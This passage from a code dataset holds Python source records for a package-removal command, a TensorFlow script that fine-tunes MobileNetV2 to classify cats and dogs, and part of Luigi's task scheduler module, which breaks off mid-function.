self._parse_arguments(argv)\n\n\t\tif args.targets:\n\t\t\tself.remove(args.targets, args)\n\n\tdef remove(self, targets, args):\n\t\ttargets = self.package_manager.resolve_names(targets, local=True)\n\t\tself.package_manager.remove(targets, recursive=args.recursive, noconfirm=self.global_args.noconfirm)\n\n\tdef _parse_arguments(self, argv):\n\t\tparser = argparse.ArgumentParser(prog='confiles', add_help=False, usage='%(prog)s -R [options]')\n\n\t\tparser.add_argument('-s', '--recursive', action='store_true')\n\n\t\tparser.add_argument('-h', '--help', action='store_true')\n\n\t\tparser.add_argument('targets', nargs='*')\n\n\t\targs = parser.parse_args(argv)\n\n\t\tif args.help:\n\t\t\tparser.print_help()\n\t\t\texit()\n\n\t\treturn args\n","sub_path":"confiles/operation/remove.py","file_name":"remove.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"151567072","text":"# TensorFlow and tf.keras\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing import image_dataset_from_directory\n\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\nimport os\n\n\nimport io\nimport itertools\nfrom packaging import version\n\n\nfrom tensorflow import keras\nfrom tensorflow.keras import models\n\nfrom PIL.Image import *\nimport urllib.request\n\nimport numpy as np\nimport 
sklearn.metrics\n\nprint('Hi')\nprint(tf.__version__)\n\n\ndef show_images(train_dataset, class_names):\n plt.figure(figsize=(10, 10))\n\n for images, labels in train_dataset.take(1):\n for i in range(9):\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(images[i].numpy().astype(\"uint8\"))\n plt.title(class_names[labels[i]])\n plt.axis(\"off\")\n\n\ndef show_augmented_datas(train_dataset):\n aug = data_augmentation() # build the augmentation pipeline once\n for image, _ in train_dataset.take(1):\n plt.figure(figsize=(10, 10))\n first_image = image[0]\n for i in range(9):\n ax = plt.subplot(3, 3, i + 1)\n augmented_image = aug(tf.expand_dims(first_image, 0))\n plt.imshow(augmented_image[0] / 255)\n plt.axis('off')\n\n\ndef data_augmentation():\n pipeline = tf.keras.Sequential([\n tf.keras.layers.experimental.preprocessing.RandomFlip('horizontal'),\n tf.keras.layers.experimental.preprocessing.RandomRotation(0.2),\n ])\n\n return pipeline\n\n\ndef load_dataset(url, BATCH_SIZE, IMG_SIZE):\n path_to_zip = tf.keras.utils.get_file(\n 'cats_and_dogs.zip', origin=url, extract=True)\n\n PATH = os.path.join(os.path.dirname(path_to_zip), 'cats_and_dogs_filtered')\n\n train_dir = os.path.join(PATH, 'train')\n\n validation_dir = os.path.join(PATH, 'validation')\n\n train_dataset = image_dataset_from_directory(train_dir,\n shuffle=True,\n batch_size=BATCH_SIZE,\n image_size=IMG_SIZE)\n\n validation_dataset = image_dataset_from_directory(validation_dir,\n shuffle=True,\n batch_size=BATCH_SIZE,\n image_size=IMG_SIZE)\n class_names = train_dataset.class_names\n show_images(train_dataset, class_names)\n\n val_batches = tf.data.experimental.cardinality(validation_dataset)\n test_dataset = validation_dataset.take(val_batches // 5)\n validation_dataset = validation_dataset.skip(val_batches // 5)\n\n AUTOTUNE = tf.data.AUTOTUNE\n\n train_dataset = train_dataset.prefetch(buffer_size=AUTOTUNE)\n validation_dataset = validation_dataset.prefetch(buffer_size=AUTOTUNE)\n test_dataset = test_dataset.prefetch(buffer_size=AUTOTUNE)\n\n return (train_dataset, validation_dataset, test_dataset, class_names)\n\n\ndef create_model(train_dataset, IMG_SIZE):\n data_augmentation = tf.keras.Sequential([\n tf.keras.layers.experimental.preprocessing.RandomFlip('horizontal'),\n tf.keras.layers.experimental.preprocessing.RandomRotation(0.2),\n ])\n\n preprocess_input = tf.keras.applications.mobilenet_v2.preprocess_input\n\n rescale = tf.keras.layers.experimental.preprocessing.Rescaling(\n 1./127.5, offset=-1)\n\n # Create the base model from the pre-trained model MobileNet V2\n IMG_SHAPE = IMG_SIZE + (3,)\n base_model = tf.keras.applications.MobileNetV2(input_shape=IMG_SHAPE,\n include_top=False,\n weights='imagenet')\n\n image_batch, label_batch = next(iter(train_dataset))\n feature_batch = base_model(image_batch)\n print(feature_batch.shape)\n\n # Unfreeze the base model; the layers that stay frozen are selected below\n base_model.trainable = True\n\n # Trainable classification head\n maxpool_layer = tf.keras.layers.GlobalMaxPooling2D()\n #global_average_layer = tf.keras.layers.GlobalAveragePooling2D()\n feature_batch_average = maxpool_layer(feature_batch)\n print(feature_batch_average.shape)\n\n prediction_layer = tf.keras.layers.Dense(1)\n prediction_batch = prediction_layer(feature_batch_average)\n print(prediction_batch.shape)\n\n # Let's take a look to see how many layers are in the base model\n print(\"Number of layers in the base model: \", len(base_model.layers))\n\n # Fine-tune from this layer onwards\n fine_tune_at = 100\n\n # Freeze all the layers before the `fine_tune_at` layer\n for layer in base_model.layers[:fine_tune_at]:\n layer.trainable = False\n\n 
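# MobileNetV2 includes BatchNorm layers; the usual Keras fine-tuning recipe\n # additionally calls the base model with training=False so its BatchNorm\n # statistics stay frozen while the unfrozen top blocks are trained.\n\n 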
# Layer classification head with feature detector\n\n inputs = tf.keras.layers.Input(shape=(160, 160, 3))\n x = data_augmentation(inputs)\n x = preprocess_input(x)\n x = base_model(x)\n x = maxpool_layer(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = prediction_layer(x)\n model = tf.keras.Model(inputs=[inputs], outputs=[outputs])\n\n learning_rate = 0.0001\n\n # Compile the model\n model.compile(optimizer=tf.keras.optimizers.RMSprop(lr=learning_rate),\n loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),\n metrics=['accuracy']\n )\n\n model.summary()\n return model\n\n\ndef evaluate_model(data, model):\n loss, accuracy = model.evaluate(data)\n return (loss, accuracy)\n\ndef load_model(modelfile):\n new_model = tf.keras.models.load_model(modelfile)\n return new_model\n\n\ndef test_model(data, model, class_names):\n #Retrieve a batch of images from the test set\n image_batch, label_batch = data.as_numpy_iterator().next()\n predictions = model.predict_on_batch(image_batch).flatten()\n\n \n # Apply a sigmoid since our model returns logits\n pred = tf.nn.sigmoid(predictions)\n predictions = tf.where(pred < 0.5, 0, 1)\n\n print('Predictions:\\n', predictions.numpy())\n print('Labels:\\n', label_batch)\n\n plt.figure(figsize=(10, 10))\n for i in range(9):\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(image_batch[i].astype(\"uint8\"))\n plt.title(class_names[predictions[i]])\n plt.axis(\"off\")\n\ndef img_test(img_path, model, class_names):\n im=urllib.request.urlretrieve(img_path, \"sample.png\")\n\n img = tf.keras.preprocessing.image.load_img(\"sample.png\", target_size=(160, 160))\n img_tensor = tf.keras.preprocessing.image.img_to_array(img)\n img_tensor = np.expand_dims(img_tensor, axis=0)\n img_tensor /= 255.\n plt.imshow(img_tensor[0])\n plt.show()\n print(img_tensor.shape)\n\n x = tf.keras.preprocessing.image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n images = np.vstack([x])\n classes = model.predict_on_batch(images).flatten()\n\n # Apply a sigmoid since our model returns logits, then threshold the probability\n pred = tf.nn.sigmoid(classes)\n predictions = tf.where(pred < 0.5, 0, 1)\n\n print('Predictions:\\n', predictions.numpy())\n print(\"Predicted class is:\",class_names[predictions[0]])","sub_path":"toolbox.py","file_name":"toolbox.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"134078419","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2012-2015 Spotify AB\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"\nThe system for scheduling tasks and executing them in order.\nDeals with dependencies, priorities, resources, etc.\nThe :py:class:`~luigi.worker.Worker` pulls tasks from the scheduler (usually over the REST interface) and executes them.\nSee :doc:`/central_scheduler` for more info.\n\"\"\"\n\nimport collections\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\nimport datetime\n
import functools\nimport itertools\nimport logging\nimport os\nimport time\n\nfrom luigi import six\n\nfrom luigi import configuration\nfrom luigi import notifications\nfrom luigi import parameter\nfrom luigi import task_history as history\nfrom luigi.task_status import DISABLED, DONE, FAILED, PENDING, RUNNING, SUSPENDED, UNKNOWN\nfrom luigi.task import Config\n\nlogger = logging.getLogger(\"luigi.server\")\n\n\nclass Scheduler(object):\n \"\"\"\n Abstract base class.\n\n Note that the methods all take string arguments, not Task objects...\n \"\"\"\n add_task = NotImplemented\n get_work = NotImplemented\n ping = NotImplemented\n\nUPSTREAM_RUNNING = 'UPSTREAM_RUNNING'\nUPSTREAM_MISSING_INPUT = 'UPSTREAM_MISSING_INPUT'\nUPSTREAM_FAILED = 'UPSTREAM_FAILED'\nUPSTREAM_DISABLED = 'UPSTREAM_DISABLED'\n\nUPSTREAM_SEVERITY_ORDER = (\n '',\n UPSTREAM_RUNNING,\n UPSTREAM_MISSING_INPUT,\n UPSTREAM_FAILED,\n UPSTREAM_DISABLED,\n)\nUPSTREAM_SEVERITY_KEY = UPSTREAM_SEVERITY_ORDER.index\nSTATUS_TO_UPSTREAM_MAP = {\n FAILED: UPSTREAM_FAILED,\n RUNNING: UPSTREAM_RUNNING,\n PENDING: UPSTREAM_MISSING_INPUT,\n DISABLED: UPSTREAM_DISABLED,\n}\n\n\nclass scheduler(Config):\n # TODO(erikbern): the config_path is needed for backwards compatibility. We should drop the compatibility\n # at some point (in particular this would force users to replace all dashes with underscores in the config)\n retry_delay = parameter.FloatParameter(default=900.0)\n remove_delay = parameter.FloatParameter(default=600.0)\n worker_disconnect_delay = parameter.FloatParameter(default=60.0)\n state_path = parameter.Parameter(default='/var/lib/luigi-server/state.pickle')\n\n # Jobs are disabled if we see more than disable_failures failures in disable_window seconds.\n # These disables last for disable_persist seconds.\n disable_window = parameter.IntParameter(default=3600,\n config_path=dict(section='scheduler', name='disable-window-seconds'))\n disable_failures = parameter.IntParameter(default=None,\n config_path=dict(section='scheduler', name='disable-num-failures'))\n disable_hard_timeout = parameter.IntParameter(default=None,\n config_path=dict(section='scheduler', name='disable-hard-timeout'))\n disable_persist = parameter.IntParameter(default=86400,\n config_path=dict(section='scheduler', name='disable-persist-seconds'))\n max_shown_tasks = parameter.IntParameter(default=100000)\n prune_done_tasks = parameter.BoolParameter(default=False)\n\n record_task_history = parameter.BoolParameter(default=False)\n record_task_history_sqs = parameter.BoolParameter(default=False,\n config_path=dict(section='scheduler', name='record_task_history_sqs'))\n\n visualization_graph = parameter.Parameter(default=\"svg\", config_path=dict(section='scheduler', name='visualization-graph'))\n\n\ndef fix_time(x):\n # Backwards compatibility for a fix in Dec 2014. 
Prior to the fix, pickled state might store datetime objects\n # Let's remove this function soon\n if isinstance(x, datetime.datetime):\n return time.mktime(x.timetuple())\n else:\n return x\n\n\nclass Failures(object):\n \"\"\"\n This class tracks the number of failures in a given time window.\n\n Failures added are marked with the current timestamp, and this class counts\n the number of failures in a sliding time window ending at the present.\n \"\"\"\n\n def __init__(self, window):\n \"\"\"\n Initialize with the given window.\n\n :param window: how long to track failures for, as a float (number of seconds).\n \"\"\"\n self.window = window\n self.failures = collections.deque()\n self.first_failure_time = None\n\n def add_failure(self):\n \"\"\"\n Add a failure event with the current timestamp.\n \"\"\"\n failure_time = time.time()\n\n if not self.first_failure_time:\n self.first_failure_time = failure_time\n\n self.failures.append(failure_time)\n\n def num_failures(self):\n \"\"\"\n Return the number of failures in the window.\n \"\"\"\n min_time = time.time() - self.window\n\n while self.failures and fix_time(self.failures[0]) < min_time:\n self.failures.popleft()\n\n return len(self.failures)\n\n def clear(self):\n \"\"\"\n Clear the failure queue.\n \"\"\"\n self.failures.clear()\n\n\ndef _get_default(x, default):\n if x is not None:\n return x\n else:\n return default\n\n\nclass Task(object):\n\n def __init__(self, task_id, status, deps, resources=None, priority=0, family='', module=None,\n params=None, disable_failures=None, disable_window=None, disable_hard_timeout=None):\n self.id = task_id\n self.stakeholders = set() # workers ids that are somehow related to this task (i.e. don't prune while any of these workers are still active)\n self.workers = set() # workers ids that can perform task - task is 'BROKEN' if none of these workers are active\n if deps is None:\n self.deps = set()\n else:\n self.deps = set(deps)\n self.status = status # PENDING, RUNNING, FAILED or DONE\n self.time = time.time() # Timestamp when task was first added\n self.retry = None\n self.remove = None\n self.worker_running = None # the worker id that is currently running the task or None\n self.time_running = None # Timestamp when picked up by worker\n self.expl = None\n self.priority = priority\n self.resources = _get_default(resources, {})\n self.family = family\n self.module = module\n self.params = _get_default(params, {})\n self.disable_failures = disable_failures\n self.disable_hard_timeout = disable_hard_timeout\n self.failures = Failures(disable_window)\n self.scheduler_disable_time = None\n\n def __repr__(self):\n return \"Task(%r)\" % vars(self)\n\n def add_failure(self):\n self.failures.add_failure()\n\n def has_excessive_failures(self):\n\n excessive_failures = False\n\n if (self.failures.first_failure_time is not None and\n self.disable_hard_timeout):\n if (time.time() >= self.failures.first_failure_time +\n self.disable_hard_timeout):\n excessive_failures = True\n\n if self.failures.num_failures() >= self.disable_failures:\n excessive_failures = True\n\n return excessive_failures\n\n def can_disable(self):\n return (self.disable_failures is not None or\n self.disable_hard_timeout is not None)\n\n\nclass Worker(object):\n \"\"\"\n Structure for tracking worker activity and keeping their references.\n \"\"\"\n\n def __init__(self, worker_id, last_active=None):\n self.id = worker_id\n self.reference = None # reference to the worker in the real world. 
(Currently a dict containing just the host)\n self.last_active = last_active # seconds since epoch\n self.started = time.time() # seconds since epoch\n self.info = {}\n\n def add_info(self, info):\n self.info.update(info)\n\n def update(self, worker_reference):\n if worker_reference:\n self.reference = worker_reference\n self.last_active = time.time()\n\n def prune(self, config):\n # Delete workers that haven't said anything for a while (probably killed)\n if self.last_active + config.worker_disconnect_delay < time.time():\n return True\n\n @property\n def assistant(self):\n return self.info.get('assistant', False)\n\n def __str__(self):\n return self.id\n\n\nclass SimpleTaskState(object):\n \"\"\"\n Keep track of the current state and handle persistance.\n\n The point of this class is to enable other ways to keep state, eg. by using a database\n These will be implemented by creating an abstract base class that this and other classes\n inherit from.\n \"\"\"\n\n def __init__(self, state_path):\n self._state_path = state_path\n self._tasks = {} # map from id to a Task object\n self._status_tasks = collections.defaultdict(dict)\n self._active_workers = {} # map from id to a Worker object\n\n def dump(self):\n state = (self._tasks, self._active_workers)\n try:\n with open(self._state_path, 'wb') as fobj:\n pickle.dump(state, fobj)\n except IOError:\n logger.warning(\"Failed saving scheduler state\", exc_info=1)\n else:\n logger.info(\"Saved state in %s\", self._state_path)\n\n # prone to lead to crashes when old state is unpickled with updated code. TODO some kind of version control?\n def load(self):\n if os.path.exists(self._state_path):\n logger.info(\"Attempting to load state from %s\", self._state_path)\n try:\n with open(self._state_path, 'rb') as fobj:\n state = pickle.load(fobj)\n except BaseException:\n logger.exception(\"Error when loading state. Starting from clean slate.\")\n return\n\n self._tasks, self._active_workers = state\n self._status_tasks = collections.defaultdict(dict)\n for task in six.itervalues(self._tasks):\n self._status_tasks[task.status][task.id] = task\n\n # Convert from old format\n # TODO: this is really ugly, we need something more future-proof\n # Every time we add an attribute to the Worker class, this code needs to be updated\n for k, v in six.iteritems(self._active_workers):\n if isinstance(v, float):\n self._active_workers[k] = Worker(worker_id=k, last_active=v)\n else:\n logger.info(\"No prior state file exists at %s. 
Starting with clean slate\", self._state_path)\n\n def get_active_tasks(self, status=None):\n if status:\n for task in six.itervalues(self._status_tasks[status]):\n yield task\n else:\n for task in six.itervalues(self._tasks):\n yield task\n\n def get_running_tasks(self):\n return six.itervalues(self._status_tasks[RUNNING])\n\n def get_pending_tasks(self):\n return itertools.chain.from_iterable(six.itervalues(self._status_tasks[status])\n for status in [PENDING, RUNNING])\n\n def get_task(self, task_id, default=None, setdefault=None):\n if setdefault:\n task = self._tasks.setdefault(task_id, setdefault)\n self._status_tasks[task.status][task.id] = task\n return task\n else:\n return self._tasks.get(task_id, default)\n\n def has_task(self, task_id):\n return task_id in self._tasks\n\n def re_enable(self, task, config=None):\n task.scheduler_disable_time = None\n task.failures.clear()\n if config:\n self.set_status(task, FAILED, config)\n task.failures.clear()\n\n def set_status(self, task, new_status, config=None):\n if new_status == FAILED:\n assert config is not None\n\n # not sure why we have SUSPENDED, as it can never be set\n if new_status == SUSPENDED:\n new_status = PENDING\n\n if new_status == DISABLED and task.status == RUNNING:\n return\n\n if task.status == DISABLED:\n if new_status == DONE:\n self.re_enable(task)\n\n # don't allow workers to override a scheduler disable\n elif task.scheduler_disable_time is not None:\n return\n\n if new_status == FAILED and task.can_disable():\n task.add_failure()\n if task.has_excessive_failures():\n task.scheduler_disable_time = time.time()\n new_status = DISABLED\n notifications.send_error_email(\n 'Luigi Scheduler: DISABLED {task} due to excessive failures'.format(task=task.id),\n '{task} failed {failures} times in the last {window} seconds, so it is being '\n 'disabled for {persist} seconds'.format(\n failures=config.disable_failures,\n task=task.id,\n window=config.disable_window,\n persist=config.disable_persist,\n ))\n elif new_status == DISABLED:\n task.scheduler_disable_time = None\n\n self._status_tasks[task.status].pop(task.id)\n self._status_tasks[new_status][task.id] = task\n task.status = new_status\n\n def prune(self, task, config, assistants):\n remove = False\n\n # Mark tasks with no remaining active stakeholders for deletion\n if not task.stakeholders:\n if task.remove is None:\n logger.info(\"Task %r has stakeholders %r but none remain connected -> will remove \"\n \"task in %s seconds\", task.id, task.stakeholders, config.remove_delay)\n task.remove = time.time() + config.remove_delay\n\n # If a running worker disconnects, tag all its jobs as FAILED and subject it to the same retry logic\n if task.status == RUNNING and task.worker_running and task.worker_running not in task.stakeholders | assistants:\n logger.info(\"Task %r is marked as running by disconnected worker %r -> marking as \"\n \"FAILED with retry delay of %rs\", task.id, task.worker_running,\n config.retry_delay)\n task.worker_running = None\n self.set_status(task, FAILED, config)\n task.retry = time.time() + config.retry_delay\n\n # Re-enable task after the disable time expires\n if task.status == DISABLED and task.scheduler_disable_time:\n if time.time() - fix_time(task.scheduler_disable_time) > config.disable_persist:\n self.re_enable(task, config)\n\n # Remove tasks that have no stakeholders\n if task.remove and time.time() > task.remove:\n logger.info(\"Removing task %r (no connected stakeholders)\", task.id)\n remove = True\n\n # Reset FAILED tasks to 
PENDING if max timeout is reached, and retry delay is >= 0\n if task.status == FAILED and config.retry_delay >= 0 and task.retry < time.time():\n self.set_status(task, PENDING, config)\n\n return remove\n\n def inactivate_tasks(self, delete_tasks):\n # The terminology is a bit confusing: we used to \"delete\" tasks when they became inactive,\n # but with a pluggable state storage, you might very well want to keep some history of\n # older tasks as well. That's why we call it \"inactivate\" (as in the verb)\n for task in delete_tasks:\n task_obj = self._tasks.pop(task)\n self._status_tasks[task_obj.status].pop(task)\n\n def get_active_workers(self, last_active_lt=None):\n for worker in six.itervalues(self._active_workers):\n if last_active_lt is not None and worker.last_active >= last_active_lt:\n continue\n yield worker\n\n def get_assistants(self, last_active_lt=None):\n return filter(lambda w: w.assistant, self.get_active_workers(last_active_lt))\n\n def get_worker_ids(self):\n return self._active_workers.keys() # only used for unit tests\n\n def get_worker(self, worker_id):\n return self._active_workers.setdefault(worker_id, Worker(worker_id))\n\n def inactivate_workers(self, delete_workers):\n # Mark workers as inactive\n for worker in delete_workers:\n self._active_workers.pop(worker)\n\n # remove workers from tasks\n for task in self.get_active_tasks():\n task.stakeholders.difference_update(delete_workers)\n task.workers.difference_update(delete_workers)\n\n def get_necessary_tasks(self):\n necessary_tasks = set()\n for task in self.get_active_tasks():\n if task.status not in (DONE, DISABLED) or \\\n getattr(task, 'scheduler_disable_time', None) is not None:\n necessary_tasks.update(task.deps)\n necessary_tasks.add(task.id)\n return necessary_tasks\n\n\nclass CentralPlannerScheduler(Scheduler):\n \"\"\"\n Async scheduler that can handle multiple workers, etc.\n\n Can be run locally or on a server (using RemoteScheduler + server.Server).\n \"\"\"\n\n def __init__(self, config=None, resources=None, task_history_impl=None, **kwargs):\n \"\"\"\n Keyword Arguments:\n :param config: an object of class \"scheduler\" or None (in which the global instance will be used)\n :param resources: a dict of str->int constraints\n :param task_history_override: ignore config and use this object as the task history\n \"\"\"\n self._config = config or scheduler(**kwargs)\n self._state = SimpleTaskState(self._config.state_path)\n\n if task_history_impl:\n self._task_history = task_history_impl\n elif self._config.record_task_history:\n from luigi import db_task_history # Needs sqlalchemy, thus imported here\n self._task_history = db_task_history.DbTaskHistory()\n elif self._config.record_task_history_sqs:\n import sqs_history # Needs boto, dateutil, thus imported here\n self._task_history = sqs_history.SqsTaskHistory()\n else:\n self._task_history = history.NopHistory()\n\n self._resources = resources or configuration.get_config().getintdict('resources') # TODO: Can we make this a Parameter?\n self._make_task = functools.partial(\n Task, disable_failures=self._config.disable_failures,\n disable_hard_timeout=self._config.disable_hard_timeout,\n disable_window=self._config.disable_window)\n\n def load(self):\n self._state.load()\n\n def dump(self):\n self._state.dump()\n\n def prune(self):\n logger.info(\"Starting pruning of task graph\")\n remove_workers = []\n for worker in self._state.get_active_workers():\n if worker.prune(self._config):\n logger.info(\"Worker %s timed out (no contact for >=%ss)\", 
worker, self._config.worker_disconnect_delay)\n remove_workers.append(worker.id)\n\n self._state.inactivate_workers(remove_workers)\n\n assistant_ids = set(w.id for w in self._state.get_assistants())\n remove_tasks = []\n\n if assistant_ids:\n necessary_tasks = self._state.get_necessary_tasks()\n else:\n necessary_tasks = ()\n\n for task in self._state.get_active_tasks():\n if task.id not in necessary_tasks and self._state.prune(task, self._config, assistant_ids):\n remove_tasks.append(task.id)\n\n self._state.inactivate_tasks(remove_tasks)\n\n logger.info(\"Done pruning task graph\")\n\n def update(self, worker_id, worker_reference=None):\n \"\"\"\n Keep track of whenever the worker was last active.\n \"\"\"\n worker = self._state.get_worker(worker_id)\n worker.update(worker_reference)\n\n def _update_priority(self, task, prio, worker):\n \"\"\"\n Update priority of the given task.\n\n Priority can only be increased.\n If the task doesn't exist, a placeholder task is created to preserve priority when the task is later scheduled.\n \"\"\"\n task.priority = prio = max(prio, task.priority)\n for dep in task.deps or []:\n t = self._state.get_task(dep)\n if t is not None and prio > t.priority:\n self._update_priority(t, prio, worker)\n\n def add_task(self, task_id=None, status=PENDING, runnable=True,\n deps=None, new_deps=None, expl=None, resources=None,\n priority=0, family='', module=None, params=None,\n assistant=False, **kwargs):\n \"\"\"\n * add task identified by task_id if it doesn't exist\n * if deps is not None, update dependency list\n * update status of task\n * add additional workers/stakeholders\n * update priority when needed\n \"\"\"\n worker_id = kwargs['worker']\n self.update(worker_id)\n\n task = self._state.get_task(task_id, setdefault=self._make_task(\n task_id=task_id, status=PENDING, deps=deps, resources=resources,\n priority=priority, family=family, module=module, params=params))\n\n # for setting priority, we'll sometimes create tasks with unset family and params\n if not task.family:\n task.family = family\n if not getattr(task, 'module', None):\n task.module = module\n if not task.params:\n task.params = _get_default(params, {})\n\n if task.remove is not None:\n task.remove = None # unmark task for removal so it isn't removed after being added\n\n if not (task.status == RUNNING and status == PENDING):\n # don't allow re-scheduling of task while it is running, it must either fail or succeed first\n self._update_task_history(task_id, status, worker_id=worker_id)\n self._state.set_status(task, PENDING if status == SUSPENDED else status, self._config)\n\n if status == FAILED:\n task.retry = time.time() + self._config.retry_delay\n\n if deps is not None:\n task.deps = set(deps)\n\n if new_deps is not None:\n task.deps.update(new_deps)\n\n if resources is not None:\n task.resources = resources\n\n if not assistant:\n task.stakeholders.add(worker_id)\n\n # Task dependencies might not exist yet. 
Let's create dummy tasks for them for now.\n # Otherwise the task dependencies might end up being pruned if scheduling takes a long time\n for dep in task.deps or []:\n t = self._state.get_task(dep, setdefault=self._make_task(task_id=dep, status=UNKNOWN, deps=None, priority=priority))\n t.stakeholders.add(worker_id)\n\n self._update_priority(task, priority, worker_id)\n\n if runnable:\n task.workers.add(worker_id)\n\n if expl is not None:\n task.expl = expl\n\n def add_worker(self, worker, info, **kwargs):\n self._state.get_worker(worker).add_info(info)\n\n def update_resources(self, **resources):\n if self._resources is None:\n self._resources = {}\n self._resources.update(resources)\n\n def _has_resources(self, needed_resources, used_resources):\n if needed_resources is None:\n return True\n\n available_resources = self._resources or {}\n for resource, amount in six.iteritems(needed_resources):\n if amount + used_resources[resource] > available_resources.get(resource, 1):\n return False\n return True\n\n def _used_resources(self):\n used_resources = collections.defaultdict(int)\n if self._resources is not None:\n for task in self._state.get_active_tasks():\n if task.status == RUNNING and task.resources:\n for resource, amount in six.iteritems(task.resources):\n used_resources[resource] += amount\n return used_resources\n\n def _rank(self):\n \"\"\"\n Return worker's rank function for task scheduling.\n\n :return:\n \"\"\"\n dependents = collections.defaultdict(int)\n\n def not_done(t):\n task = self._state.get_task(t, default=None)\n return task is None or task.status != DONE\n for task in self._state.get_pending_tasks():\n if task.status != DONE:\n deps = list(filter(not_done, task.deps))\n inverse_num_deps = 1.0 / max(len(deps), 1)\n for dep in deps:\n dependents[dep] += inverse_num_deps\n\n return lambda task: (task.priority, dependents[task.id], -task.time)\n\n def _schedulable(self, task):\n if task.status != PENDING:\n return False\n for dep in task.deps:\n dep_task = self._state.get_task(dep, default=None)\n if dep_task is None or dep_task.status != DONE:\n return False\n return True\n\n def get_work(self, host=None, assistant=False, **kwargs):\n # TODO: remove any expired nodes\n\n # Algo: iterate over all nodes, find the highest priority node no dependencies and available\n # resources.\n\n # Resource checking looks both at currently available resources and at which resources would\n # be available if all running tasks died and we rescheduled all workers greedily. 
We do both\n # checks in order to prevent a worker with many low-priority tasks from starving other\n # workers with higher priority tasks that share the same resources.\n\n # TODO: remove tasks that can't be done, figure out if the worker has absolutely\n # nothing it can wait for\n\n worker_id = kwargs['worker']\n # Return remaining tasks that have no FAILED descendents\n self.update(worker_id, {'host': host})\n if assistant:\n self.add_worker(worker_id, [('assistant', assistant)])\n best_task = None\n locally_pending_tasks = 0\n running_tasks = []\n upstream_table = {}\n\n used_resources = self._used_resources()\n greedy_resources = collections.defaultdict(int)\n n_unique_pending = 0\n greedy_workers = dict((worker.id, worker.info.get('workers', 1))\n for worker in self._state.get_active_workers())\n\n tasks = list(self._state.get_pending_tasks())\n tasks.sort(key=self._rank(), reverse=True)\n\n for task in tasks:\n upstream_status = self._upstream_status(task.id, upstream_table)\n in_workers = (assistant and task.workers) or worker_id in task.workers\n if task.status == RUNNING and in_workers:\n # Return a list of currently running tasks to the client,\n # makes it easier to troubleshoot\n other_worker = self._state.get_worker(task.worker_running)\n more_info = {'task_id': task.id, 'worker': str(other_worker)}\n if other_worker is not None:\n more_info.update(other_worker.info)\n running_tasks.append(more_info)\n\n if task.status == PENDING and in_workers and upstream_status != UPSTREAM_DISABLED:\n locally_pending_tasks += 1\n if len(task.workers) == 1 and not assistant:\n n_unique_pending += 1\n\n if task.status == RUNNING and (task.worker_running in greedy_workers):\n greedy_workers[task.worker_running] -= 1\n for resource, amount in six.iteritems((task.resources or {})):\n greedy_resources[resource] += amount\n\n if not best_task and self._schedulable(task) and self._has_resources(task.resources, greedy_resources):\n if in_workers and self._has_resources(task.resources, used_resources):\n best_task = task\n else:\n workers = itertools.chain(task.workers, [worker_id]) if assistant else task.workers\n for task_worker in workers:\n if greedy_workers.get(task_worker, 0) > 0:\n # use up a worker\n greedy_workers[task_worker] -= 1\n\n # keep track of the resources used in greedy scheduling\n for resource, amount in six.iteritems((task.resources or {})):\n greedy_resources[resource] += amount\n\n break\n\n reply = {'n_pending_tasks': locally_pending_tasks,\n 'running_tasks': running_tasks,\n 'task_id': None,\n 'n_unique_pending': n_unique_pending}\n\n if best_task:\n self._state.set_status(best_task, RUNNING, self._config)\n best_task.worker_running = worker_id\n best_task.time_running = time.time()\n self._update_task_history(best_task.id, RUNNING, host=host, worker_id=worker_id)\n\n reply['task_id'] = best_task.id\n reply['task_family'] = best_task.family\n reply['task_module'] = getattr(best_task, 'module', None)\n reply['task_params'] = best_task.params\n\n return reply\n\n def ping(self, **kwargs):\n worker_id = kwargs['worker']\n self.update(worker_id)\n\n def _upstream_status(self, task_id, upstream_status_table):\n if task_id in upstream_status_table:\n return upstream_status_table[task_id]\n elif self._state.has_task(task_id):\n task_stack = [task_id]\n\n while task_stack:\n dep_id = task_stack.pop()\n if self._state.has_task(dep_id):\n dep = self._state.get_task(dep_id)\n if dep_id not in upstream_status_table:\n if dep.status == PENDING and dep.deps:\n task_stack = task_stack + 
[dep_id] + list(dep.deps)\n upstream_status_table[dep_id] = '' # will be updated postorder\n else:\n dep_status = STATUS_TO_UPSTREAM_MAP.get(dep.status, '')\n upstream_status_table[dep_id] = dep_status\n elif upstream_status_table[dep_id] == '' and dep.deps:\n # This is the postorder update step when we set the\n # status based on the previously calculated child elements\n upstream_status = [upstream_status_table.get(task_id, '') for task_id in dep.deps]\n upstream_status.append('') # to handle empty list\n status = max(upstream_status, key=UPSTREAM_SEVERITY_KEY)\n upstream_status_table[dep_id] = status\n return upstream_status_table[dep_id]\n\n def _serialize_task(self, task_id, include_deps=True):\n task = self._state.get_task(task_id)\n ret = {\n 'status': task.status,\n 'workers': list(task.workers),\n 'worker_running': task.worker_running,\n 'time_running': getattr(task, \"time_running\", None),\n 'start_time': task.time,\n 'params': task.params,\n 'name': task.family,\n 'priority': task.priority,\n 'resources': task.resources,\n }\n if task.status == DISABLED:\n ret['re_enable_able'] = task.scheduler_disable_time is not None\n if include_deps:\n ret['deps'] = list(task.deps)\n return ret\n\n def graph(self, **kwargs):\n self.prune()\n serialized = {}\n for task in self._state.get_active_tasks():\n serialized[task.id] = self._serialize_task(task.id)\n return serialized\n\n def _recurse_deps(self, task_id, serialized):\n if task_id not in serialized:\n task = 